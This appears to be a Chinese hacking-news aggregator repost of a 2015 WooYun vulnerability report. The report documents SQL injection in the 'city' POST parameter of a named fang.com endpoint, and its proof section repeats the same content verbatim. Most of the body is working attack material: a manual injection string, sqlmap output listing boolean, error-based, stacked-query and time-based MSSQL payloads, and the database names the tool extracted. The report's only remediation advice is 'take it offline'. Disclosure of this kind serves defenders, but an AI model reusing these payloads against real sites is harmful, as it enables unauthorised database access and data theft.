记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

搜房网某分站boolean类型SQL盲注

2015-09-28 15:15

http://shequ.fang.com/i/xiaoquAjax.ashx

post类型,在city参数上

city=bj' and len(user_name())=7 and 'aa'='aa&districtID=0&Method=GetAreaList&r=3.1415926



手工测试

1=1时,页面有返回值。

sf.png





1=2时,页面无返回值。

sf2.png





sqlmap跑测

code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Parameter: city (POST)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: city=bj' AND 8290=8290 AND 'GyZG'='GyZG&districtID=0&Method=GetAreaList&r=3.14



Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

Payload: city=bj' AND 1937=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (1937=1937) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(98)+CHAR(122)+CHAR(113))) AND 'abgt'='abgt&districtID=0&Method=GetAreaList&r=3.14



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries (comment)

Payload: city=bj';WAITFOR DELAY '0:0:5'--&districtID=0&Method=GetAreaList&r=3.14



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind (comment)

Payload: city=bj' WAITFOR DELAY '0:0:5'--&districtID=0&Method=GetAreaList&r=3.14

---

[12:50:03] [INFO] the back-end DBMS is Microsoft SQL Server

web server operating system: Windows

web application technology: ASP.NET, ASP.NET 2.0.50727

back-end DBMS: Microsoft SQL Server 2008

[12:50:03] [INFO] fetching database names

[12:50:03] [INFO] the SQL query used returns 3 entries

[12:50:03] [INFO] resumed: master

[12:50:03] [INFO] resumed: SheQu

[12:50:03] [INFO] resumed: tempdb

available databases [3]:

[*] master

[*] SheQu

[*] tempdb

漏洞证明:

http://shequ.fang.com/i/xiaoquAjax.ashx

post类型,在city参数上

city=bj' and len(user_name())=7 and 'aa'='aa&districtID=0&Method=GetAreaList&r=3.1415926



手工测试

1=1时,页面有返回值。

sf.png





1=2时,页面无返回值。

sf2.png





sqlmap跑测

code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Parameter: city (POST)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: city=bj' AND 8290=8290 AND 'GyZG'='GyZG&districtID=0&Method=GetAreaList&r=3.14



Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

Payload: city=bj' AND 1937=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (1937=1937) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(98)+CHAR(122)+CHAR(113))) AND 'abgt'='abgt&districtID=0&Method=GetAreaList&r=3.14



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries (comment)

Payload: city=bj';WAITFOR DELAY '0:0:5'--&districtID=0&Method=GetAreaList&r=3.14



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind (comment)

Payload: city=bj' WAITFOR DELAY '0:0:5'--&districtID=0&Method=GetAreaList&r=3.14

---

[12:50:03] [INFO] the back-end DBMS is Microsoft SQL Server

web server operating system: Windows

web application technology: ASP.NET, ASP.NET 2.0.50727

back-end DBMS: Microsoft SQL Server 2008

[12:50:03] [INFO] fetching database names

[12:50:03] [INFO] the SQL query used returns 3 entries

[12:50:03] [INFO] resumed: master

[12:50:03] [INFO] resumed: SheQu

[12:50:03] [INFO] resumed: tempdb

available databases [3]:

[*] master

[*] SheQu

[*] tempdb

修复方案:

下线吧

知识来源: www.wooyun.org/bugs/wooyun-2015-0133833

阅读:131639 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“搜房网某分站boolean类型SQL盲注”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云